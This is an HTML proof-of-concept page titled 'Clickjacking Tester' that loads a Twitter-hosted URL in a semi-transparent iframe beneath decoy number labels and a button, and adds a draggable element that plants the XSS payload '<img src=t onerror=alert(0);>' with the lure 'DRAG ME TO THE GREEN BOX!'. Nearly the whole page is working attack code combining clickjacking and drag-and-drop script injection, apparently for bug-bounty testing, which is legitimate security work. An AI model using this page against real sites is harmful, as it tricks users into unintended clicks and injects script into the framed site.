<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Clickjacking Tester</title>
    <style>
      *{
        margin: 0;
        padding: 0
      }
      iframe{
        width: 100%;
        height: 300px;
        border: none;
    Opacity: 0.3
      }
      header{
        height: 50px;
      }
      button{
    position: fixed;
    width: 150px;    
    height: 50px;
    left: 45%;
    top: 50%;
      }
      div.spoofing{
    text-align: center;
    background: #eee;
    border-radius: 3px;
    width: 90%;
    height: 50px;
    padding-top:25px;
    font-size:20px
      }
      span{
    background: #eee;
    border-radius: 3px;
    position: fixed;  
      }
      span.one{left: 63%;top: 20%;}
      span.tow{right: 10%;bottom: 3%;}
    </style>
  </head>
  <body>
   <center><div draggable="true" ondragstart='event.dataTransfer.setData("text/plain", "<img src=t onerror=alert(0);>")'><h3>DRAG ME TO THE GREEN BOX!</h3></div></center>
    <iframe style="height:0"></iframe>
    <span class="one">1</span><span class="tow">2</span>
        <iframe id="cj" src="https://twitter.twimg.com/LP=1906"></iframe>

    
  </body>
</html>
